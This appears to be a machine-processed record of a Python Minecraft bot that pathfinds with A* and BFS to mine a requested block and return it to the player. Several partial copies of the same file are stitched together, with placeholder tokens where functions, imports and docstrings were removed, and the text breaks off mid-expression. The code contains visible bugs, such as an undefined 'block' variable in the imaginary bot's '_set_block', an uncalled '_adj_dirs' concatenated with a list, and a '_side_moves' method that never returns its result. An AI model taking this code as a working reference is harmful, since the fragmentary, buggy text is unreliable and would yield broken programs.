(pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the 
block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. 
This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. 
Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': 
(pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = 
bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. 
This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 
'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def _surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n        self._changes[deepcopy(pos)] = block_\n\n    def _get_block(self, pos):\n        \"\"\"Get the block at the position.\"\"\"\n        if pos in self._changes:\n            return self._changes[pos]\n        else:\n            return _get_mc().getBlock(pos)\n\n    def get_block(self, pos):\n        \"\"\"The public version.\"\"\"\n        return self._get_block(pos)\n\n    def __hash__(self):\n        \"\"\"Return the hash.\"\"\"\n        return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n            _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n    \"\"\"The real bot.\n\n    All vector arguments are Vec3s.\"\"\"\n    _BOT_BLOCK = block.IRON_BLOCK.id\n\n    def __init__(self):\n        \"\"\"Create a bot next to the player.\"\"\"\n        pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n        pos = _Vec3(pos.x, pos.y, pos.z)\n        _GenericBot.__init__(self, pos)\n        self._pos = pos\n        self._move(self._pos)\n\n    @staticmethod\n    def destroy_all():\n        \"\"\"Destroy all bots within a small distance (in case I forget to\n        destroy one).\"\"\"\n        player_loc = _player_loc()\n        minec = _get_mc()\n        rad = 10\n        for x in xrange(player_loc.x - rad, player_loc.x + rad):\n            for y in xrange(player_loc.y - rad, player_loc.y + rad):\n                for z in xrange(player_loc.z - rad, player_loc.z + rad):\n                    if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n                        minec.setBlock(x, y, z, _AIR)\n\n    def destroy(self):\n        \"\"\"Set itself to air.\"\"\"\n        self._set_block(self._pos, _AIR)\n        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n    def fetch(self, block_name):\n        \"\"\"Mine and return a block to the player.\"\"\"\n        imag_bot = _ImaginaryBot(self._pos, self._inventory)\n        block_id = getattr(block, block_name).id\n        block_loc = self._get_block_loc(block_id)\n        mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n        mine_actions = astar(mine_prob, _mine_heuristic)\n        self.take_actions(mine_actions, _DELAY)\n        imag_bot = _ImaginaryBot(self._pos, self._inventory)\n        player_loc = _player_loc()\n        return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n        return_actions = astar(return_prob, _return_heuristic)\n        imag_bot.take_actions(return_actions)\n        return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos() +\n            player_loc) / 2,), 'kwargs': {'block_': block_id}})\n        self.take_actions(return_actions, _DELAY)\n\n    def _get_block_loc(self, block_id):\n        \"\"\"Return the location of the block.\"\"\"\n        find_prob = FindProblem(self._pos, block_id)\n        dirs = bfs(find_prob)\n        return self._pos + sum(dirs)\n\n    def _set_block(self, pos, block_):\n        \"\"\"Place an actual block in the world.\n\n        block_ is a block id.\"\"\"\n        _get_mc().setBlock(pos, block_)\n\n    def _get_block(self, pos):\n        \"\"\"Get the block at the position.\"\"\"\n        return _get_mc().getBlock(pos)\n\n    def _move(self, pos):\n        \"\"\"Move there, and set the appropriate blocks.\"\"\"\n        self._set_block(self._pos, _AIR)\n        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n        self._set_block(pos, self._BOT_BLOCK)\n        self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n        self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n    \"\"\"Problem for finding the location of a block in the world.\n\n    A state in this problem is a location.\n    \"\"\"\n\n    def __init__(self, start_loc, block_id):\n        \"\"\"Initialize.\"\"\"\n        self._start_loc = deepcopy(start_loc)\n        self._block_id = block_id\n\n    def getStartState(self):\n        \"\"\"Return the starting location.\"\"\"\n        return self._start_loc\n\n    def isGoalState(self, state):\n        return _get_mc().getBlock(state) == self._block_id\n\n    def getSuccessors(self, state):\n        \"\"\"Return the successors.\"\"\"\n        rtn = []\n        for dir_ in 
\n\nclass FindProblem(SearchProblem):\n    \"\"\"Problem for finding the location of a block in the world.\n\n    A state in this problem is a location.\n    \"\"\"\n\n
    def __init__(self, start_loc, block_id):\n        \"\"\"Initialize.\"\"\"\n        self._start_loc = deepcopy(start_loc)\n        self._block_id = block_id\n\n
    def getStartState(self):\n        \"\"\"Return the starting location.\"\"\"\n        return self._start_loc\n\n
    def isGoalState(self, state):\n        \"\"\"Return whether or not the block is at the state's location.\"\"\"\n        return _get_mc().getBlock(state) == self._block_id\n\n
    def getSuccessors(self, state):\n        \"\"\"Return the successors.\"\"\"\n        rtn = []\n        for dir_ in _all_dirs():\n            successor = state + dir_\n
            if successor.y <= _get_mc().getHeight(successor.x, successor.z\n                ) and _get_mc().getBlock(successor) != _BEDROCK:\n
                rtn.append((successor, dir_, 1))\n        return rtn\n\n\nclass _MineProblem(SearchProblem):\n
    \"\"\"The problem of finding the block and mining it (not returning\n    it).\"\"\"\n\n    def __init__(self, imag_bot, block_loc, block_id):\n
        \"\"\"Initialize the problem with an _ImaginaryBot.\n\n        block_loc is a Vec3.\n        \"\"\"\n        self._bot = imag_bot\n
        self._block_loc = deepcopy(block_loc)\n        self._block_id = block_id\n\n    def get_block_loc(self):\n        \"\"\"Return the block location.\"\"\"\n
        return deepcopy(self._block_loc)\n\n    def get_block_id(self):\n        \"\"\"Return the block it's trying to mine.\"\"\"\n        return self._block_id\n\n
    def getStartState(self):\n        \"\"\"Return the bot passed in.\"\"\"\n        return self._bot\n\n    def isGoalState(self, state):\n
        \"\"\"Return whether or not the bot has the block.\"\"\"\n        return state.contains(self._block_id)\n\n    def getSuccessors(self, state):\n
        \"\"\"Return the successors.\"\"\"\n        rtn = []\n        for action in state.get_legal_actions():\n            successor = deepcopy(state)\n
            successor.take_action(action)\n            rtn.append((successor, action, 1))\n        return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n
    \"\"\"The problem of returning to the player. This does not place the block\n    next to the player.\"\"\"\n\n    def __init__(self, imag_bot, block_, player_loc):\n
        \"\"\"Initialize the problem with an _ImaginaryBot.\n\n        block_ is a block id.\"\"\"\n        self._bot = imag_bot\n        self._block = block_\n
        self._player_loc = player_loc\n\n    def get_player_loc(self):\n        \"\"\"Return the player location.\"\"\"\n        return deepcopy(self._player_loc)\n\n
    def getStartState(self):\n        \"\"\"Return the bot passed in.\"\"\"\n        return self._bot\n\n    def isGoalState(self, state):\n
        \"\"\"Return whether or not the bot is next to the player.\"\"\"\n        diff = state.get_pos() - self._player_loc\n
        return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n            ) + abs(diff.z) == 2 and state.get_block(self._player_loc +\n
